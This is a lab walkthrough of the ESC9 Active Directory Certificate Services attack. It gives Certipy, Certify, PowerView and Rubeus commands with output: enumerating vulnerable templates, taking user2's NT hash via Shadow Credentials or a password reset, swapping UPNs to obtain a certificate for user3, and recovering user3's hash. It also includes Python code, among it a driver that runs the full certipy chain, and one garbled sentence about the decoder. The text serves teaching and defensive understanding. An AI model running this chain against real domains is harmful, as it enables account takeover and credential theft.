ESC9

1. What is ESC9

1.1. Understanding ESC9 and certificate mapping

Exploiting ESC9 depends on certificate mapping, so it is worth understanding how the two relate.

Keep in mind: if a certificate template's msPKI-Enrollment-Flag attribute contains the CT_FLAG_NO_SECURITY_EXTENSION flag, the CA does not embed the szOID_NTDS_CA_SECURITY_EXT security extension (the requester's objectSid) in the certificates it issues. A certificate without that extension cannot be strongly mapped, so as long as the KDC's StrongCertificateBindingEnforcement registry value is not 2 (Full Enforcement), the KDC falls back to weak mapping by the UPN or DNS name in the SAN, exactly as it would with the value set to 0 (value 1, Compatibility mode, only adds a warning, Kerberos-Key-Distribution-Center Event ID 39). With the value 2 such a certificate is rejected outright. The default was 1 for a long time, but Microsoft's KB5014754 timeline moved domain controllers with no explicit value to Full Enforcement in February 2025, so on patched DCs ESC9 requires an administrator to have lowered the value.

Therefore, if we can change one account's UPN so that it matches another account's, the flaw is exploitable: set account A's UPN to account B's, request a certificate as A (the CA builds the SAN from A's current UPN, i.e. B's), restore A's UPN, and authenticate with that certificate as B.
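The mapping decision described above, and the registry values discussed later under 2.3.1, as an added Python model (not code from the page or from Certipy): it issues a certificate the way the CA does for a template with and without CT_FLAG_NO_SECURITY_EXTENSION, then applies the KDC's mapping rule for StrongCertificateBindingEnforcement values 0, 1 and 2. The accounts, user3's SID and the directory lookup are constructed assumptions; user2's SID is the one PowerView prints later on the page.

```python
from __future__ import annotations

from dataclasses import dataclass
from typing import Optional

# msPKI-Enrollment-Flag bit that suppresses szOID_NTDS_CA_SECURITY_EXT (MS-CRTD 2.26)
CT_FLAG_NO_SECURITY_EXTENSION = 0x00080000
# flags of the page's ESC9 template: IncludeSymmetricAlgorithms | PublishToDs | AutoEnrollment | NoSecurityExtension
ESC9_TEMPLATE_FLAGS = 0x1 | 0x8 | 0x20 | CT_FLAG_NO_SECURITY_EXTENSION
# the same template with the flag cleared, for comparison
HARDENED_TEMPLATE_FLAGS = 0x1 | 0x8 | 0x20


@dataclass
class Account:
    sam: str
    sid: str
    upn: str


@dataclass
class Certificate:
    san_upn: str                      # SAN built by the CA from the requester's UPN
    object_sid: Optional[str] = None  # szOID_NTDS_CA_SECURITY_EXT, absent under ESC9


def ca_issue(enrollment_flag: int, requester: Account) -> Certificate:
    """CA side: the SAN is filled from whatever UPN the requester currently has,
    and the SID extension is added unless the template suppresses it."""
    cert = Certificate(san_upn=requester.upn)
    if not enrollment_flag & CT_FLAG_NO_SECURITY_EXTENSION:
        cert.object_sid = requester.sid
    return cert


def kdc_map(cert: Certificate, directory: list[Account], enforcement: int) -> str:
    """KDC side: return the sAMAccountName the certificate logs on as, or a
    'REJECT: ...' string. `enforcement` stands for the value of
    HKLM\\SYSTEM\\CurrentControlSet\\Services\\Kdc\\StrongCertificateBindingEnforcement:
    0 disabled, 1 compatibility, 2 full enforcement."""
    if cert.object_sid is not None:
        # strong mapping: the embedded SID decides, the UPN in the SAN is not consulted
        for acct in directory:
            if acct.sid == cert.object_sid:
                return acct.sam
        return "REJECT: SID extension matches no account"
    if enforcement == 2:
        return "REJECT: no SID extension under Full Enforcement"
    # 0 and 1 both fall back to weak mapping; 1 additionally logs
    # Kerberos-Key-Distribution-Center Event ID 39 (certificate not strongly mapped)
    hits = [a for a in directory if a.upn.lower() == cert.san_upn.lower()]
    if len(hits) != 1:
        return f"REJECT: UPN {cert.san_upn} matches {len(hits)} accounts"
    return hits[0].sam


def esc9_demo(enforcement: int, template_flags: int = ESC9_TEMPLATE_FLAGS,
              restore_upn: bool = True) -> str:
    """Replay the page's sequence. user2's SID is the one shown on the page;
    user3's RID (1193) is an assumption."""
    user2 = Account("user2", "S-1-5-21-2570265163-3918697770-3667495639-1192", "user2@lab.local")
    user3 = Account("user3", "S-1-5-21-2570265163-3918697770-3667495639-1193", "user3@lab.local")
    directory = [user2, user3]

    user2.upn = user3.upn                         # certipy account update ... -upn user3@lab.local
    cert = ca_issue(template_flags, user2)        # certipy req -u user2 ... -template ESC9
    if restore_upn:
        user2.upn = "user2@lab.local"             # certipy account update ... -upn user2@lab.local
    return kdc_map(cert, directory, enforcement)  # certipy auth -pfx user3.pfx


if __name__ == "__main__":
    for enf in (0, 1, 2):
        print(f"ESC9 template, enforcement={enf}: {esc9_demo(enf)}")
    print("hardened template, enforcement=1:", esc9_demo(1, HARDENED_TEMPLATE_FLAGS))
    print("ESC9 template, UPN not restored:", esc9_demo(1, restore_upn=False))
```

The hardened-template case shows why the SID extension closes the hole: the same UPN swap then maps straight back to user2, because the KDC never looks at the SAN when a SID is present. The unrestored case shows why the restore step belongs before the authentication, not after it.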

2. Exploitation

2.1. Prerequisites

  • StrongCertificateBindingEnforcement on the KDC is not set to 2 (the old default was 1), or the Schannel CertificateMappingMethods value contains the UPN flag (0x4). Ordinary users cannot read these registry values remotely, so from a low-privileged position this condition can only be tested by attempting the attack.
  • The certificate template's msPKI-Enrollment-Flag value contains the CT_FLAG_NO_SECURITY_EXTENSION flag.
  • The template explicitly specifies a client authentication EKU (and, for the UPN-swap variant shown here, builds the SAN from the account's UPN, i.e. SubjectAltRequireUpn).
  • At least GenericWrite over one user account, in order to change its UPN.

2.2. On Linux

2.2.1. Enumeration

┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy find -u 'blwasp@lab.local' -p 'Password123!' -dc-ip 10.129.22.58 -vulnerable -stdout
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 41 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 18 enabled certificate templates
[*] Finding issuance policies
[*] Found 29 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'lab-LAB-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'lab-LAB-DC-CA'
[*] Checking web enrollment for CA 'lab-LAB-DC-CA' @ 'LAB-DC.lab.local'
[!] Error checking web enrollment: [Errno 104] Connection reset by peer
[!] Use -debug to print a stacktrace
[*] Enumeration output:

Template Name                       : ESC9
Display Name                        : ESC9
Certificate Authorities             : lab-LAB-DC-CA
Enabled                             : True
Client Authentication               : True
Enrollment Agent                    : False
Any Purpose                         : False
Enrollee Supplies Subject           : False
Certificate Name Flag               : SubjectAltRequireUpn
                                      SubjectAltRequireEmail
                                      SubjectRequireEmail
                                      SubjectRequireDirectoryPath
Enrollment Flag                     : IncludeSymmetricAlgorithms
                                      PublishToDs
                                      AutoEnrollment
                                      NoSecurityExtension
Private Key Flag                    : ExportableKey
Extended Key Usage                  : Client Authentication
                                      Secure Email
                                      Encrypting File System
Requires Manager Approval           : False
Requires Key Archival               : False
Authorized Signatures Required      : 0
Schema Version                      : 2
Validity Period                     : 99 years
Renewal Period                      : 6 weeks
Minimum RSA Key Length              : 2048
Template Created                    : 2023-05-03T11:21:35+00:00
Template Last Modified              : 2023-07-05T11:47:33+00:00
Permissions
  Enrollment Permissions
    Enrollment Rights               : LAB.LOCAL\Domain Admins
                                      LAB.LOCAL\Domain Users
                                      LAB.LOCAL\Enterprise Admins
  Object Control Permissions
    Owner                           : LAB.LOCAL\Administrator
    Full Control Principals         : LAB.LOCAL\Domain Admins
                                      LAB.LOCAL\Enterprise Admins
    Write Owner Principals          : LAB.LOCAL\Domain Admins
                                      LAB.LOCAL\Enterprise Admins
    Write Dacl Principals           : LAB.LOCAL\Domain Admins
                                      LAB.LOCAL\Enterprise Admins
    Write Property Enroll           : LAB.LOCAL\Domain Admins
                                      LAB.LOCAL\Domain Users
                                      LAB.LOCAL\Enterprise Admins
[+] User Enrollable Principals      : LAB.LOCAL\Domain Users
[!] Vulnerabilities
  ESC9                              : Template has no security extension.
[*] Remarks
  ESC9                              : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
  • The template's Enrollment Flag includes NoSecurityExtension, which means its msPKI-Enrollment-Flag attribute contains CT_FLAG_NO_SECURITY_EXTENSION, so certificates issued from it carry no objectSid extension. Note that Certipy flags ESC9 purely from the template attributes; it cannot read the KDC's StrongCertificateBindingEnforcement value as a low-privileged user, which is why the remark says other prerequisites may still be required. The web-enrollment error above is unrelated and non-fatal.
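To see what Certipy's NoSecurityExtension line corresponds to in the raw attributes, here is an added Python decoder (not code from the page, Certipy or Certify) that turns the msPKI-Enrollment-Flag and msPKI-Certificate-Name-Flag integers into flag names and evaluates the template-side ESC9 conditions. The bit values are from MS-CRTD; the sample entries are constructed to match the ESC9 template above and a default User template. It also handles the signed form in which AD returns values with bit 31 set, which is why SubjectRequireDirectoryPath makes the raw name flag appear as a negative number in an LDAP query.

```python
from __future__ import annotations

# msPKI-Enrollment-Flag bits (MS-CRTD 2.26), named as Certipy prints them
ENROLLMENT_FLAGS = {
    0x00000001: "IncludeSymmetricAlgorithms",
    0x00000002: "PendAllRequests",
    0x00000004: "PublishToKraContainer",
    0x00000008: "PublishToDs",
    0x00000010: "AutoEnrollmentCheckUserDsCertificate",
    0x00000020: "AutoEnrollment",
    0x00000040: "PreviousApprovalValidateReenrollment",
    0x00000100: "UserInteractionRequired",
    0x00000400: "RemoveInvalidCertificateFromPersonalStore",
    0x00000800: "AllowEnrollOnBehalfOf",
    0x00001000: "AddOcspNocheck",
    0x00002000: "EnableKeyReuseOnNtTokenKeysetStorageFull",
    0x00004000: "NoRevocationInfoInIssuedCerts",
    0x00008000: "IncludeBasicConstraintsForEeCerts",
    0x00010000: "AllowPreviousApprovalKeyBasedRenewalValidateReenrollment",
    0x00020000: "IssuancePoliciesFromRequest",
    0x00040000: "SkipAutoRenewal",
    0x00080000: "NoSecurityExtension",
}
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002      # shown as "Requires Manager Approval"
CT_FLAG_NO_SECURITY_EXTENSION = 0x00080000

# msPKI-Certificate-Name-Flag bits (MS-CRTD 2.28) that matter here
NAME_FLAGS = {
    0x00000001: "EnrolleeSuppliesSubject",
    0x02000000: "SubjectAltRequireUpn",
    0x04000000: "SubjectAltRequireEmail",
    0x08000000: "SubjectAltRequireDns",
    0x20000000: "SubjectRequireEmail",
    0x40000000: "SubjectRequireCommonName",
    0x80000000: "SubjectRequireDirectoryPath",
}
CT_FLAG_SUBJECT_ALT_REQUIRE_UPN = 0x02000000

# EKUs that permit logon; an empty pKIExtendedKeyUsage also means "any purpose"
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2": "Client Authentication",
    "1.3.6.1.5.2.3.4": "PKINIT Client Authentication",
    "1.3.6.1.4.1.311.20.2.2": "Smart Card Logon",
    "2.5.29.37.0": "Any Purpose",
}


def decode_flags(value: int, table: dict[int, str]) -> list[str]:
    """Turn a raw flag integer into flag names. AD returns these attributes as
    signed 32-bit integers, so a set 0x80000000 bit arrives as a negative
    number; mask back to unsigned before testing bits."""
    value &= 0xFFFFFFFF
    names = [name for bit, name in table.items() if value & bit]
    known = 0
    for bit in table:
        known |= bit
    if value & ~known:
        names.append(f"Unknown(0x{value & ~known:08x})")
    return names


def check_esc9_template(entry: dict) -> dict:
    """Evaluate the template-side ESC9 prerequisites from raw LDAP attributes."""
    eflag = entry["msPKI-Enrollment-Flag"] & 0xFFFFFFFF
    nflag = entry["msPKI-Certificate-Name-Flag"] & 0xFFFFFFFF
    ekus = entry.get("pKIExtendedKeyUsage", [])
    result = {
        "enrollment_flags": decode_flags(eflag, ENROLLMENT_FLAGS),
        "name_flags": decode_flags(nflag, NAME_FLAGS),
        "no_security_extension": bool(eflag & CT_FLAG_NO_SECURITY_EXTENSION),
        "client_auth": not ekus or any(oid in CLIENT_AUTH_EKUS for oid in ekus),
        "manager_approval": bool(eflag & CT_FLAG_PEND_ALL_REQUESTS),
        "signatures_required": entry.get("msPKI-RA-Signature", 0),
        # the UPN-swap variant needs the CA to build the SAN from the account's UPN
        "san_from_upn": bool(nflag & CT_FLAG_SUBJECT_ALT_REQUIRE_UPN),
    }
    result["esc9"] = (
        result["no_security_extension"]
        and result["client_auth"]
        and not result["manager_approval"]
        and result["signatures_required"] == 0
    )
    return result


# Constructed entries mirroring the page's ESC9 template and a default User template.
# -1509949440 is 0xA6000000 (UPN | Email | SubjectRequireEmail | DirectoryPath) as a signed LDAP integer.
SAMPLE_TEMPLATES = {
    "ESC9": {
        "msPKI-Enrollment-Flag": 0x00080029,
        "msPKI-Certificate-Name-Flag": -1509949440,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4", "1.3.6.1.4.1.311.10.3.4"],
        "msPKI-RA-Signature": 0,
    },
    "User": {
        "msPKI-Enrollment-Flag": 0x00000029,
        "msPKI-Certificate-Name-Flag": -1509949440,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4", "1.3.6.1.4.1.311.10.3.4"],
        "msPKI-RA-Signature": 0,
    },
}

if __name__ == "__main__":
    for name, entry in SAMPLE_TEMPLATES.items():
        r = check_esc9_template(entry)
        print(f"{name}: ESC9={r['esc9']} enrollment={r['enrollment_flags']} name={r['name_flags']}")
```

The decoder reports enrollment permissions separately from nothing: it deliberately checks only template attributes, the same scope as Certipy's ESC9 finding, so who may enrol and what the KDC enforces still have to be established separately.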

2.2.2. Exploitation

We also need a user account whose UPN we can modify.
[image: Pasted image 20260421235506.png]
The target here is User2.

Targets can also be located with dacledit.py:

┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# impacket-dacledit -action read -dc-ip 10.129.72.99  lab.local/blwasp:Password123! -principal blwasp -target user2
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Parsing DACL
[*] Printing parsed DACL
[*] Filtering results for SID (S-1-5-21-2570265163-3918697770-3667495639-1103)
[*]   ACE[24] info
[*]     ACE Type                  : ACCESS_ALLOWED_ACE
[*]     ACE flags                 : CONTAINER_INHERIT_ACE, INHERITED_ACE, OBJECT_INHERIT_ACE
[*]     Access mask               : FullControl (0xf01ff)
[*]     Trustee (SID)             : blwasp (S-1-5-21-2570265163-3918697770-3667495639-1103)

Then use Shadow Credentials to obtain the target's NT hash (a write to user2's msDS-KeyCredentialLink, which our GenericAll grants; unlike a password reset it leaves user2's password intact):

┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy shadow auto -u 'BlWasp@lab.local' -p 'Password123!' -dc-ip 10.129.72.99  -target LAB-DC.lab.local -account user2
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Targeting user 'user2'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '3ae93f3b6738482693a12dc54ad10b78'
[*] Adding Key Credential with device ID '3ae93f3b6738482693a12dc54ad10b78' to the Key Credentials for 'user2'
[*] Successfully added Key Credential with device ID '3ae93f3b6738482693a12dc54ad10b78' to the Key Credentials for 'user2'
[*] Authenticating as 'user2' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'user2@lab.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'user2.ccache'
[*] Wrote credential cache to 'user2.ccache'
[*] Trying to retrieve NT hash for 'user2'
[*] Restoring the old Key Credentials for 'user2'
[*] Successfully restored the old Key Credentials for 'user2'
[*] NT hash for 'user2': ee22ddf0f8a66db4217050e6a948f9d6

Then change User2's UPN to User3's. If the domain controller enforces forest-wide UPN uniqueness the update can fail with ERROR_DS_UPN_VALUE_NOT_UNIQUE; Certipy's wiki documents using the target's sAMAccountName without a domain suffix (here user3) as the UPN in that case, which the KDC still resolves during weak mapping:

┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy account update  -u 'BlWasp@lab.local' -p 'Password123!' -dc-ip 10.129.72.99  -target LAB-DC.lab.local -user user2 -upn  user3@lab.local
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Updating user 'user2':
    userPrincipalName                   : user3@lab.local
[*] Successfully updated 'user2'

# verify
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# bloodyad --host 10.129.72.99 -d lab.local -u 'BlWasp' -p 'Password123!'  get object user2 --attr userPrincipalName

distinguishedName: CN=User2,CN=Users,DC=lab,DC=local
userPrincipalName: user3@lab.local

Then request a certificate as User2 (because the UPN was changed, the SAN of the issued certificate carries User3's UPN):

┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy req  -u 'user2@lab.local' -hashes 'ee22ddf0f8a66db4217050e6a948f9d6' -dc-ip 10.129.72.99  -target LAB-DC.lab.local -ca lab-LAB-DC-CA -template ESC9
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 63
[*] Successfully requested certificate
[*] Got certificate with UPN 'user3@lab.local'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'user3.pfx'
[*] Wrote certificate and private key to 'user3.pfx'
  • "Certificate has no object SID" means the certificate carries no objectSid (szOID_NTDS_CA_SECURITY_EXT) extension, so the KDC cannot apply strong mapping and falls back to the UPN in the SAN. That is why user2's credentials yield a certificate that maps to user3.

Restore user2's UPN before authenticating, so that user3 is the only account holding that UPN when the KDC resolves it (and so the real user2 can still log on):

┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy account update  -u 'BlWasp@lab.local' -p 'Password123!' -dc-ip 10.129.72.99  -target LAB-DC.lab.local -user user2 -upn  user2@lab.local
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Updating user 'user2':
    userPrincipalName                   : user2@lab.local
[*] Successfully updated 'user2'

Authenticate with the certificate as user3:

┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy auth -pfx user3.pfx -dc-ip 10.129.72.99
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'user3@lab.local'
[*] Using principal: 'user3@lab.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'user3.ccache'
[*] Wrote credential cache to 'user3.ccache'
[*] Trying to retrieve NT hash for 'user3'
[*] Got hash for 'user3@lab.local': aad3b435b51404eeaad3b435b51404ee:01b60104db80993eb9ead5d8f9127eec
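The whole Linux sequence above, wrapped in an added Python driver (not part of the page or of Certipy) whose only job is to run the four certipy commands in the right order and to restore user2's UPN in a finally block, so that an error during the request (wrong CA name, RPC failure, a KDC in Full Enforcement) cannot leave user2 carrying user3's UPN. Assumptions: certipy is on PATH, the lab values are those of the page, and the PFX file name is derived from the UPN in the certificate as the page's output shows.

```python
from __future__ import annotations

import subprocess
from typing import Callable, Sequence

Runner = Callable[[Sequence[str]], None]


def run_with_subprocess(argv: Sequence[str]) -> None:
    """Default runner: execute the command and raise on a non-zero exit code."""
    subprocess.run(list(argv), check=True)


class Esc9Flow:
    """Builds and runs the certipy commands from the page, in order."""

    def __init__(self, attacker: str, attacker_password: str, dc_ip: str, dc_host: str,
                 ca: str, template: str, domain: str, victim: str, victim_nt_hash: str,
                 victim_upn: str, target_upn: str) -> None:
        self.attacker, self.attacker_password = attacker, attacker_password
        self.dc_ip, self.dc_host, self.ca, self.template = dc_ip, dc_host, ca, template
        self.domain, self.victim, self.victim_nt_hash = domain, victim, victim_nt_hash
        self.victim_upn, self.target_upn = victim_upn, target_upn
        self.executed: list[list[str]] = []   # every command handed to the runner, in order

    def set_upn(self, upn: str) -> list[str]:
        return ["certipy", "account", "update", "-u", self.attacker, "-p", self.attacker_password,
                "-dc-ip", self.dc_ip, "-target", self.dc_host, "-user", self.victim, "-upn", upn]

    def request(self) -> list[str]:
        return ["certipy", "req", "-u", f"{self.victim}@{self.domain}", "-hashes", self.victim_nt_hash,
                "-dc-ip", self.dc_ip, "-target", self.dc_host, "-ca", self.ca, "-template", self.template]

    def auth(self) -> list[str]:
        # assumption: certipy names the PFX after the identity in the certificate (user3.pfx on the page)
        pfx = self.target_upn.split("@")[0] + ".pfx"
        return ["certipy", "auth", "-pfx", pfx, "-dc-ip", self.dc_ip]

    def run(self, runner: Runner = run_with_subprocess) -> list[list[str]]:
        def step(argv: list[str]) -> None:
            self.executed.append(argv)
            runner(argv)

        step(self.set_upn(self.target_upn))      # 1. victim takes the target's UPN
        try:
            step(self.request())                 # 2. enrol as the victim; SAN now carries the target UPN
        finally:
            step(self.set_upn(self.victim_upn))  # 3. always give the UPN back, even if step 2 failed
        step(self.auth())                        # 4. PKINIT as the target with the issued certificate
        return self.executed


def lab_flow() -> Esc9Flow:
    """The page's lab values."""
    return Esc9Flow(attacker="BlWasp@lab.local", attacker_password="Password123!",
                    dc_ip="10.129.72.99", dc_host="LAB-DC.lab.local", ca="lab-LAB-DC-CA",
                    template="ESC9", domain="lab.local", victim="user2",
                    victim_nt_hash="ee22ddf0f8a66db4217050e6a948f9d6",
                    victim_upn="user2@lab.local", target_upn="user3@lab.local")


if __name__ == "__main__":
    lab_flow().run()
```

run() returns the commands it executed, and the runner is injectable, so the ordering (restore before auth, restore even on failure) can be checked with a no-op runner before the script touches a real domain.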

2.3. On Windows

2.3.1. Enumeration

C:\Users\blwasp\Desktop>.\Certify.exe enum-templates --filter-enabled --filter-vulnerable

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v2.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=lab,DC=local'
[*] Classifying vulnerabilities in the context of built-in low-privileged domain groups.

Template Name                         : ESC9
Enabled                               : True
Publishing CAs                        : LAB-DC.lab.local\lab-LAB-DC-CA
Schema Version                        : 2
Validity Period                       : 99 years
Renewal Period                        : 6 weeks
Certificate Name Flag                 : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
Enrollment Flag                       : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT, NO_SECURITY_EXTENSION
Manager Approval Required             : False
Authorized Signatures Required        : 0
Extended Key Usage                    : Client Authentication, Encrypting File System, Secure Email
Certificate Application Policies      : Client Authentication, Encrypting File System, Secure Email
Vulnerabilities
  ESC9                                : The template has a client authentication EKU and no security extension.
Permissions
  Enrollment Permissions
    Enrollment Rights           : LAB\Domain Admins                  S-1-5-21-2570265163-3918697770-3667495639-512
                                  LAB\Domain Users                   S-1-5-21-2570265163-3918697770-3667495639-513
                                  LAB\Enterprise Admins              S-1-5-21-2570265163-3918697770-3667495639-519
  Object Control Permissions
    Owner                       : LAB\Administrator                  S-1-5-21-2570265163-3918697770-3667495639-500
    Write Owner                 : LAB\Administrator                  S-1-5-21-2570265163-3918697770-3667495639-500
                                  LAB\Domain Admins                  S-1-5-21-2570265163-3918697770-3667495639-512
                                  LAB\Enterprise Admins              S-1-5-21-2570265163-3918697770-3667495639-519
    Write Dacl                  : LAB\Administrator                  S-1-5-21-2570265163-3918697770-3667495639-500
                                  LAB\Domain Admins                  S-1-5-21-2570265163-3918697770-3667495639-512
                                  LAB\Enterprise Admins              S-1-5-21-2570265163-3918697770-3667495639-519
    Write Property              : LAB\Administrator                  S-1-5-21-2570265163-3918697770-3667495639-500
                                  LAB\Domain Admins                  S-1-5-21-2570265163-3918697770-3667495639-512
                                  LAB\Enterprise Admins              S-1-5-21-2570265163-3918697770-3667495639-519

Check that StrongCertificateBindingEnforcement is not set to 2 (the old default was 1), or that the Schannel CertificateMappingMethods value contains the UPN flag (0x4). Reading these keys requires local administrator or remote-registry access on the domain controller; from a low-privileged foothold the check usually has to be skipped and the attack simply attempted:

PS C:\Tools> reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc
    DependOnService    REG_MULTI_SZ    RpcSs\0Afd\0NTDS
    Description    REG_SZ    @%SystemRoot%\System32\kdcsvc.dll,-2
    DisplayName    REG_SZ    @%SystemRoot%\System32\kdcsvc.dll,-1
    ErrorControl    REG_DWORD    0x1
    Group    REG_SZ    MS_WindowsRemoteValidation
    ImagePath    REG_EXPAND_SZ    %SystemRoot%\System32\lsass.exe
    ObjectName    REG_SZ    LocalSystem
    Start    REG_DWORD    0x2
    Type    REG_DWORD    0x20
    StrongCertificateBindingEnforcement    REG_DWORD    0x0
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc\Security

StrongCertificateBindingEnforcement here is 0x0, i.e. strong binding enforcement is disabled entirely, which already satisfies the first condition (any value other than 2 does). The Schannel value below is 0x4 (UPN mapping), which satisfies the second; either one alone is enough:

PS C:\Tools> reg query HKLM\System\CurrentControlSet\Control\SecurityProviders\Schannel\

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel
    EventLogging    REG_DWORD    0x1
    CertificateMappingMethods    REG_DWORD    0x4
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel\Ciphers
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel\CipherSuites
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel\Hashes
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel\KeyExchangeAlgorithms
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel\Protocols

The other requirements are that the template allows client authentication and that we hold at least GenericWrite over one user account; PowerView can find such ACEs:

PS C:\Tools> Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> $blwasp=(Get-DomainUser -Identity blwasp)

PS C:\Tools> Get-DomainObjectAcl -LDAPFilter "(&(objectClass=user)(objectCategory=person))" -ResolveGUIDs | ? {($_.ActiveDirectoryRights -contains "GenericAll" -or $_.ActiveDirectoryRights -contains "GenericWrite") -and $_.SecurityIdentifier -eq $blwasp.objectsid}

<SNIP>

AceType               : AccessAllowed
ObjectDN              : CN=User2,CN=Users,DC=lab,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength          : 0
ObjectSID             : S-1-5-21-2570265163-3918697770-3667495639-1192
InheritanceFlags      : ContainerInherit, ObjectInherit
BinaryLength          : 36
IsInherited           : True
IsCallback            : False
PropagationFlags      : None
SecurityIdentifier    : S-1-5-21-2570265163-3918697770-3667495639-1103
AccessMask            : 983551
AuditFlags            : None
AceFlags              : ObjectInherit, ContainerInherit, Inherited
AceQualifier          : AccessAllowed

<SNIP>

2.3.2. Exploitation

Reset user2's password so that we can request a certificate in user2's context later. This is the noisy option: it locks the real user out and logs a 4724 event on the DC; the Shadow Credentials approach from the Linux section avoids both.

PS C:\Tools> Set-DomainUserPassword -Identity user2 -AccountPassword $((ConvertTo-SecureString 'Newpassword123!' -AsPlainText -Force)) -Verbose

VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'user2'
VERBOSE: [Set-DomainUserPassword] Password for user 'user2' successfully reset

Change user2's UPN to user3's:

PS C:\Tools> Set-DomainObject user2 -Set @{'userPrincipalName'='user3@lab.local'} -Verbose

VERBOSE: [Get-DomainSearcher] search base: LDAP://LAB-DC.LAB.LOCAL/DC=LAB,DC=LOCAL
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=user2)(name=user2)(displayname=user2))))
VERBOSE: [Set-DomainObject] Setting 'userPrincipalName' to 'user3@lab.local' for object 'user2'

Request a certificate from the vulnerable template as user2 (from a session running as user2, e.g. after logging on with the new password):

C:\Users\user2\Desktop>Certify.exe request --ca LAB-DC.lab.local\lab-LAB-DC-CA --template ESC9

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v2.0.0

[*] Action: Request a certificate

[*] Current user context    : LAB\user2
[*] No subject name specified, using current context as subject.

[*] Template                : ESC9
[*] Subject                 : CN=User2, CN=Users, DC=lab, DC=local

[*] Certificate Authority   : LAB-DC.lab.local\lab-LAB-DC-CA
[*] CA Response             : The certificate has been issued.
[*] Request ID              : 65

[*] Certificate (PFX)       :

MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqhkiG9wxxxxxx

Save the base64 PFX to a file (user3.pfx), restore user2's UPN with Set-DomainObject exactly as it was changed above (for the same reason as in the Linux section: only user3 may hold that UPN when the KDC resolves it), and then request a TGT as user3 with Rubeus. Rubeus accepts either the file path or the base64 blob itself in /certificate:

.\Rubeus.exe asktgt /user:user3 /certificate:user3.pfx /getcredentials /nowrap

3. Case studies:

4. References: